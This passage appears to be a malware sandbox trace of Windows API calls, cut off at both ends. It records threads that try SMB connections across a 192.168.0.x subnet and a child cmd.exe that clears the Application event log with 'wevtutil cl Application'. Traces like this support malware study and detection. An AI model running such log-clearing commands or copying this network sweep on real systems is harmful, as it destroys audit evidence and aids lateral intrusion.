0x5c0 [0143.989] GetCurrentThreadId () returned 0x5c0 [0143.989] _errno () returned 0x297ec60 [0143.989] wcslen (_String="192.168.0.244") returned 0xd [0143.989] wcstombs (in: _Dest=0x1d437038, _Source="192.168.0.244", _MaxCount=0xe | out: _Dest="192.168.0.244") returned 0xd [0143.989] htons (hostshort=0x1bd) returned 0xbd01 [0143.989] inet_addr (cp="192.168.0.244") returned 0xf400a8c0 [0143.989] socket (af=2, type=1, protocol=0) returned 0x155c [0143.989] connect (s=0x155c, name=0x252bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.244"), namelen=16) returned -1 [0165.157] GetCurrentThreadId () returned 0x5c0 [0165.157] GetCurrentThreadId () returned 0x5c0 [0165.157] longjmp () [0165.157] GetCurrentThreadId () returned 0x5c0 [0165.157] CloseHandle (hObject=0x154c) returned 1 [0165.157] GetCurrentThreadId () returned 0x5c0 [0165.157] Sleep (dwMilliseconds=0x0) [0165.221] _endthreadex (_ReturnCode=0x0) Thread: id = 1040 os_tid = 0xd84 [0143.991] GetCurrentThreadId () returned 0xd84 [0143.991] GetCurrentThreadId () returned 0xd84 [0143.991] GetCurrentThreadId () returned 0xd84 [0143.991] _errno () returned 0x297b450 [0143.991] wcslen (_String="192.168.0.245") returned 0xd [0143.991] wcstombs (in: _Dest=0x1d435028, _Source="192.168.0.245", _MaxCount=0xe | out: _Dest="192.168.0.245") returned 0xd [0143.991] htons (hostshort=0x1bd) returned 0xbd01 [0143.991] inet_addr (cp="192.168.0.245") returned 0xf500a8c0 [0143.991] socket (af=2, type=1, protocol=0) returned 0x1570 [0143.991] connect (s=0x1570, name=0x254ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.245"), namelen=16) returned -1 [0165.157] GetCurrentThreadId () returned 0xd84 [0165.157] GetCurrentThreadId () returned 0xd84 [0165.157] longjmp () [0165.157] GetCurrentThreadId () returned 0xd84 [0165.157] CloseHandle (hObject=0x1560) returned 1 [0165.157] GetCurrentThreadId () returned 0xd84 [0165.157] Sleep (dwMilliseconds=0x0) [0165.222] _endthreadex (_ReturnCode=0x0) Thread: id = 1041 os_tid = 0xd90 [0143.992] GetCurrentThreadId () returned 0xd90 [0143.992] GetCurrentThreadId () returned 0xd90 [0143.992] GetCurrentThreadId () returned 0xd90 [0143.992] _errno () returned 0x297b678 [0143.992] wcslen (_String="192.168.0.246") returned 0xd [0143.993] wcstombs (in: _Dest=0x1d43d068, _Source="192.168.0.246", _MaxCount=0xe | out: _Dest="192.168.0.246") returned 0xd [0143.993] htons (hostshort=0x1bd) returned 0xbd01 [0143.993] inet_addr (cp="192.168.0.246") returned 0xf600a8c0 [0143.993] socket (af=2, type=1, protocol=0) returned 0x1584 [0143.993] connect (s=0x1584, name=0x2573fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.246"), namelen=16) returned -1 [0165.157] GetCurrentThreadId () returned 0xd90 [0165.157] GetCurrentThreadId () returned 0xd90 [0165.157] longjmp () [0165.157] GetCurrentThreadId () returned 0xd90 [0165.157] CloseHandle (hObject=0x1574) returned 1 [0165.157] GetCurrentThreadId () returned 0xd90 [0165.157] Sleep (dwMilliseconds=0x0) [0165.222] _endthreadex (_ReturnCode=0x0) Thread: id = 1042 os_tid = 0xb4c [0144.010] GetCurrentThreadId () returned 0xb4c [0144.010] GetCurrentThreadId () returned 0xb4c [0144.010] GetCurrentThreadId () returned 0xb4c [0144.010] _errno () returned 0x297b228 [0144.010] wcslen (_String="192.168.0.247") returned 0xd [0144.010] wcstombs (in: _Dest=0x1d436030, _Source="192.168.0.247", _MaxCount=0xe | out: _Dest="192.168.0.247") returned 0xd [0144.010] htons (hostshort=0x1bd) returned 0xbd01 [0144.010] inet_addr (cp="192.168.0.247") returned 0xf700a8c0 [0144.010] socket (af=2, type=1, protocol=0) returned 0x1594 [0144.010] connect (s=0x1594, name=0x2597fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.247"), namelen=16) returned -1 [0165.157] GetCurrentThreadId () returned 0xb4c [0165.158] GetCurrentThreadId () returned 0xb4c [0165.158] longjmp () [0165.158] GetCurrentThreadId () returned 0xb4c [0165.158] CloseHandle (hObject=0x1588) returned 1 [0165.158] GetCurrentThreadId () returned 0xb4c [0165.158] Sleep (dwMilliseconds=0x0) [0165.223] _endthreadex (_ReturnCode=0x0) Thread: id = 1043 os_tid = 0xd38 [0144.012] GetCurrentThreadId () returned 0xd38 [0144.012] GetCurrentThreadId () returned 0xd38 [0144.012] GetCurrentThreadId () returned 0xd38 [0144.012] _errno () returned 0x297bac8 [0144.012] wcslen (_String="192.168.0.248") returned 0xd [0144.012] wcstombs (in: _Dest=0x1d43e070, _Source="192.168.0.248", _MaxCount=0xe | out: _Dest="192.168.0.248") returned 0xd [0144.012] htons (hostshort=0x1bd) returned 0xbd01 [0144.012] inet_addr (cp="192.168.0.248") returned 0xf800a8c0 [0144.012] socket (af=2, type=1, protocol=0) returned 0x15a8 [0144.012] connect (s=0x15a8, name=0x25bbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.248"), namelen=16) returned -1 [0165.158] GetCurrentThreadId () returned 0xd38 [0165.158] GetCurrentThreadId () returned 0xd38 [0165.158] longjmp () [0165.158] GetCurrentThreadId () returned 0xd38 [0165.158] CloseHandle (hObject=0x1598) returned 1 [0165.158] GetCurrentThreadId () returned 0xd38 [0165.158] Sleep (dwMilliseconds=0x0) [0165.224] _endthreadex (_ReturnCode=0x0) Thread: id = 1044 os_tid = 0x300 [0144.013] GetCurrentThreadId () returned 0x300 [0144.014] GetCurrentThreadId () returned 0x300 [0144.014] GetCurrentThreadId () returned 0x300 [0144.014] _errno () returned 0x297bf18 [0144.014] wcslen (_String="192.168.0.249") returned 0xd [0144.014] wcstombs (in: _Dest=0x1d43f078, _Source="192.168.0.249", _MaxCount=0xe | out: _Dest="192.168.0.249") returned 0xd [0144.014] htons (hostshort=0x1bd) returned 0xbd01 [0144.014] inet_addr (cp="192.168.0.249") returned 0xf900a8c0 [0144.014] socket (af=2, type=1, protocol=0) returned 0x15bc [0144.014] connect (s=0x15bc, name=0x25dffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.249"), namelen=16) returned -1 [0165.158] GetCurrentThreadId () returned 0x300 [0165.158] GetCurrentThreadId () returned 0x300 [0165.158] longjmp () [0165.158] GetCurrentThreadId () returned 0x300 [0165.158] CloseHandle (hObject=0x15ac) returned 1 [0165.158] GetCurrentThreadId () returned 0x300 [0165.158] Sleep (dwMilliseconds=0x0) [0165.224] _endthreadex (_ReturnCode=0x0) Thread: id = 1045 os_tid = 0xdb8 [0144.015] GetCurrentThreadId () returned 0xdb8 [0144.016] GetCurrentThreadId () returned 0xdb8 [0144.016] GetCurrentThreadId () returned 0xdb8 [0144.016] _errno () returned 0x297bcf0 [0144.016] wcslen (_String="192.168.0.250") returned 0xd [0144.016] wcstombs (in: _Dest=0x1d440080, _Source="192.168.0.250", _MaxCount=0xe | out: _Dest="192.168.0.250") returned 0xd [0144.016] htons (hostshort=0x1bd) returned 0xbd01 [0144.016] inet_addr (cp="192.168.0.250") returned 0xfa00a8c0 [0144.016] socket (af=2, type=1, protocol=0) returned 0x15d0 [0144.016] connect (s=0x15d0, name=0x2603fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.250"), namelen=16) returned -1 [0165.158] GetCurrentThreadId () returned 0xdb8 [0165.158] GetCurrentThreadId () returned 0xdb8 [0165.158] longjmp () [0165.158] GetCurrentThreadId () returned 0xdb8 [0165.158] CloseHandle (hObject=0x15c0) returned 1 [0165.158] GetCurrentThreadId () returned 0xdb8 [0165.158] Sleep (dwMilliseconds=0x0) [0165.225] _endthreadex (_ReturnCode=0x0) Thread: id = 1046 os_tid = 0xd94 [0144.017] GetCurrentThreadId () returned 0xd94 [0144.017] GetCurrentThreadId () returned 0xd94 [0144.017] GetCurrentThreadId () returned 0xd94 [0144.017] _errno () returned 0x297c368 [0144.020] wcslen (_String="192.168.0.251") returned 0xd [0144.021] wcstombs (in: _Dest=0x1d445de0, _Source="192.168.0.251", _MaxCount=0xe | out: _Dest="192.168.0.251") returned 0xd [0144.021] htons (hostshort=0x1bd) returned 0xbd01 [0144.021] inet_addr (cp="192.168.0.251") returned 0xfb00a8c0 [0144.021] socket (af=2, type=1, protocol=0) returned 0x15e4 [0144.021] connect (s=0x15e4, name=0x2627fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.251"), namelen=16) returned -1 [0165.320] GetCurrentThreadId () returned 0xd94 [0165.320] GetCurrentThreadId () returned 0xd94 [0165.320] longjmp () [0165.320] GetCurrentThreadId () returned 0xd94 [0165.320] CloseHandle (hObject=0x15d4) returned 1 [0165.320] GetCurrentThreadId () returned 0xd94 [0165.320] Sleep (dwMilliseconds=0x0) [0165.321] _endthreadex (_ReturnCode=0x0) Thread: id = 1047 os_tid = 0x764 [0144.022] GetCurrentThreadId () returned 0x764 [0144.022] GetCurrentThreadId () returned 0x764 [0144.022] GetCurrentThreadId () returned 0x764 [0144.022] _errno () returned 0x297c140 [0144.022] wcslen (_String="192.168.0.252") returned 0xd [0144.022] wcstombs (in: _Dest=0x1d44ae08, _Source="192.168.0.252", _MaxCount=0xe | out: _Dest="192.168.0.252") returned 0xd [0144.022] htons (hostshort=0x1bd) returned 0xbd01 [0144.022] inet_addr (cp="192.168.0.252") returned 0xfc00a8c0 [0144.022] socket (af=2, type=1, protocol=0) returned 0x15f8 [0144.023] connect (s=0x15f8, name=0x264bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.252"), namelen=16) returned -1 [0165.320] GetCurrentThreadId () returned 0x764 [0165.320] GetCurrentThreadId () returned 0x764 [0165.320] longjmp () [0165.320] GetCurrentThreadId () returned 0x764 [0165.320] CloseHandle (hObject=0x15e8) returned 1 [0165.320] GetCurrentThreadId () returned 0x764 [0165.320] Sleep (dwMilliseconds=0x0) [0165.321] _endthreadex (_ReturnCode=0x0) Thread: id = 1048 os_tid = 0xb30 [0144.024] GetCurrentThreadId () returned 0xb30 [0144.024] GetCurrentThreadId () returned 0xb30 [0144.024] GetCurrentThreadId () returned 0xb30 [0144.024] _errno () returned 0x297c7b8 [0144.024] wcslen (_String="192.168.0.253") returned 0xd [0144.024] wcstombs (in: _Dest=0x1d44be10, _Source="192.168.0.253", _MaxCount=0xe | out: _Dest="192.168.0.253") returned 0xd [0144.024] htons (hostshort=0x1bd) returned 0xbd01 [0144.024] inet_addr (cp="192.168.0.253") returned 0xfd00a8c0 [0144.024] socket (af=2, type=1, protocol=0) returned 0x160c [0144.024] connect (s=0x160c, name=0x266ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.253"), namelen=16) returned -1 [0165.320] GetCurrentThreadId () returned 0xb30 [0165.320] GetCurrentThreadId () returned 0xb30 [0165.320] longjmp () [0165.320] GetCurrentThreadId () returned 0xb30 [0165.320] CloseHandle (hObject=0x15fc) returned 1 [0165.320] GetCurrentThreadId () returned 0xb30 [0165.320] Sleep (dwMilliseconds=0x0) [0165.322] _endthreadex (_ReturnCode=0x0) Thread: id = 1049 os_tid = 0xd50 [0144.058] GetCurrentThreadId () returned 0xd50 [0144.058] GetCurrentThreadId () returned 0xd50 [0144.058] GetCurrentThreadId () returned 0xd50 [0144.058] _errno () returned 0x297c9e0 [0144.058] wcslen (_String="192.168.0.254") returned 0xd [0144.058] wcstombs (in: _Dest=0x1d44ce18, _Source="192.168.0.254", _MaxCount=0xe | out: _Dest="192.168.0.254") returned 0xd [0144.058] htons (hostshort=0x1bd) returned 0xbd01 [0144.058] inet_addr (cp="192.168.0.254") returned 0xfe00a8c0 [0144.058] socket (af=2, type=1, protocol=0) returned 0x1620 [0144.059] connect (s=0x1620, name=0x2693fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.254"), namelen=16) returned -1 [0165.320] GetCurrentThreadId () returned 0xd50 [0165.320] GetCurrentThreadId () returned 0xd50 [0165.320] longjmp () [0165.320] GetCurrentThreadId () returned 0xd50 [0165.320] CloseHandle (hObject=0x1610) returned 1 [0165.320] GetCurrentThreadId () returned 0xd50 [0165.320] Sleep (dwMilliseconds=0x0) [0165.322] _endthreadex (_ReturnCode=0x0) Thread: id = 1393 os_tid = 0xe10 Thread: id = 1394 os_tid = 0x394 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1c53d000" os_pid = "0x774" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c wevtutil cl Application" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 225 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 226 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 227 start_va = 0x4410000 end_va = 0x442ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 228 start_va = 0x4430000 end_va = 0x4430fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 229 start_va = 0x4440000 end_va = 0x4453fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004440000" filename = "" Region: id = 230 start_va = 0x4460000 end_va = 0x449ffff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 231 start_va = 0x44a0000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 232 start_va = 0x45a0000 end_va = 0x45a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 233 start_va = 0x45b0000 end_va = 0x45b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 234 start_va = 0x45c0000 end_va = 0x45c1fff entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 235 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 236 start_va = 0x7fa60000 end_va = 0x7fa82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fa60000" filename = "" Region: id = 237 start_va = 0x7fa84000 end_va = 0x7fa84fff entry_point = 0x0 region_type = private name = "private_0x000000007fa84000" filename = "" Region: id = 238 start_va = 0x7fa8c000 end_va = 0x7fa8efff entry_point = 0x0 region_type = private name = "private_0x000000007fa8c000" filename = "" Region: id = 239 start_va = 0x7fa8f000 end_va = 0x7fa8ffff entry_point = 0x0 region_type = private name = "private_0x000000007fa8f000" filename = "" Region: id = 240 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 241 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 242 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 243 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 244 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 245 start_va = 0x4620000 end_va = 0x462ffff entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 246 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 247 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 248 start_va = 0x46c0000 end_va = 0x47bffff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 249 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 250 start_va = 0x4410000 end_va = 0x441ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004410000" filename = "" Region: id = 251 start_va = 0x47c0000 end_va = 0x487dfff entry_point = 0x47c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 252 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 253 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 254 start_va = 0x7f960000 end_va = 0x7fa5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f960000" filename = "" Region: id = 307 start_va = 0x45d0000 end_va = 0x460ffff entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 308 start_va = 0x4650000 end_va = 0x465ffff entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 309 start_va = 0x4880000 end_va = 0x497ffff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 310 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 311 start_va = 0x7fa89000 end_va = 0x7fa8bfff entry_point = 0x0 region_type = private name = "private_0x000000007fa89000" filename = "" Region: id = 312 start_va = 0x4420000 end_va = 0x4423fff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 313 start_va = 0x4430000 end_va = 0x4433fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 314 start_va = 0x4980000 end_va = 0x4cb6fff entry_point = 0x4980000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 5 os_tid = 0x764 [0093.706] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0093.706] __set_app_type (_Type=0x1) [0093.706] __p__fmode () returned 0x77ac4d6c [0093.706] __p__commode () returned 0x77ac5b1c [0093.706] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0093.706] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0093.706] GetCurrentThreadId () returned 0x764 [0093.706] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x764) returned 0x84 [0093.706] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0093.706] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0093.706] SetThreadUILanguage (LangId=0x0) returned 0x409 [0093.708] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0093.708] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x459f994 | out: phkResult=0x459f994*=0x0) returned 0x2 [0093.708] VirtualQuery (in: lpAddress=0x459f99b, lpBuffer=0x459f94c, dwLength=0x1c | out: lpBuffer=0x459f94c*(BaseAddress=0x459f000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0093.708] VirtualQuery (in: lpAddress=0x44a0000, lpBuffer=0x459f94c, dwLength=0x1c | out: lpBuffer=0x459f94c*(BaseAddress=0x44a0000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0093.709] VirtualQuery (in: lpAddress=0x44a1000, lpBuffer=0x459f94c, dwLength=0x1c | out: lpBuffer=0x459f94c*(BaseAddress=0x44a1000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0093.709] VirtualQuery (in: lpAddress=0x44a3000, lpBuffer=0x459f94c, dwLength=0x1c | out: lpBuffer=0x459f94c*(BaseAddress=0x44a3000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0093.709] VirtualQuery (in: lpAddress=0x45a0000, lpBuffer=0x459f94c, dwLength=0x1c | out: lpBuffer=0x459f94c*(BaseAddress=0x45a0000, AllocationBase=0x45a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0093.709] GetConsoleOutputCP () returned 0x1b5 [0093.709] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0093.709] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0093.709] _get_osfhandle (_FileHandle=1) returned 0x3c [0093.709] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0093.709] _get_osfhandle (_FileHandle=1) returned 0x3c [0093.709] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0093.709] _get_osfhandle (_FileHandle=1) returned 0x3c [0093.709] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0093.710] _get_osfhandle (_FileHandle=0) returned 0x38 [0093.710] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0093.710] _get_osfhandle (_FileHandle=0) returned 0x38 [0093.710] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0093.710] GetEnvironmentStringsW () returned 0x46c7d68* [0093.710] FreeEnvironmentStringsA (penv="A") returned 1 [0093.710] GetEnvironmentStringsW () returned 0x46c7d68* [0093.710] FreeEnvironmentStringsA (penv="A") returned 1 [0093.710] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x459e8f8 | out: phkResult=0x459e8f8*=0x94) returned 0x0 [0093.710] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x0, lpData=0x459e904*=0x68, lpcbData=0x459e900*=0x1000) returned 0x2 [0093.710] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x4, lpData=0x459e904*=0x1, lpcbData=0x459e900*=0x4) returned 0x0 [0093.710] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x0, lpData=0x459e904*=0x1, lpcbData=0x459e900*=0x1000) returned 0x2 [0093.710] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x4, lpData=0x459e904*=0x0, lpcbData=0x459e900*=0x4) returned 0x0 [0093.710] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x4, lpData=0x459e904*=0x40, lpcbData=0x459e900*=0x4) returned 0x0 [0093.710] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x4, lpData=0x459e904*=0x40, lpcbData=0x459e900*=0x4) returned 0x0 [0093.710] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x0, lpData=0x459e904*=0x40, lpcbData=0x459e900*=0x1000) returned 0x2 [0093.710] RegCloseKey (hKey=0x94) returned 0x0 [0093.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x459e8f8 | out: phkResult=0x459e8f8*=0x94) returned 0x0 [0093.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x0, lpData=0x459e904*=0x40, lpcbData=0x459e900*=0x1000) returned 0x2 [0093.711] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x4, lpData=0x459e904*=0x1, lpcbData=0x459e900*=0x4) returned 0x0 [0093.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x0, lpData=0x459e904*=0x1, lpcbData=0x459e900*=0x1000) returned 0x2 [0093.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x4, lpData=0x459e904*=0x0, lpcbData=0x459e900*=0x4) returned 0x0 [0093.711] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x4, lpData=0x459e904*=0x9, lpcbData=0x459e900*=0x4) returned 0x0 [0093.711] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x4, lpData=0x459e904*=0x9, lpcbData=0x459e900*=0x4) returned 0x0 [0093.711] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x459e8fc, lpData=0x459e904, lpcbData=0x459e900*=0x1000 | out: lpType=0x459e8fc*=0x0, lpData=0x459e904*=0x9, lpcbData=0x459e900*=0x1000) returned 0x2 [0093.711] RegCloseKey (hKey=0x94) returned 0x0 [0093.711] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2980e [0093.711] srand (_Seed=0x5ad2980e) [0093.711] GetCommandLineW () returned="/c wevtutil cl Application" [0093.711] GetCommandLineW () returned="/c wevtutil cl Application" [0093.711] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0093.711] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x46c9cc0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0093.711] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0093.711] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: 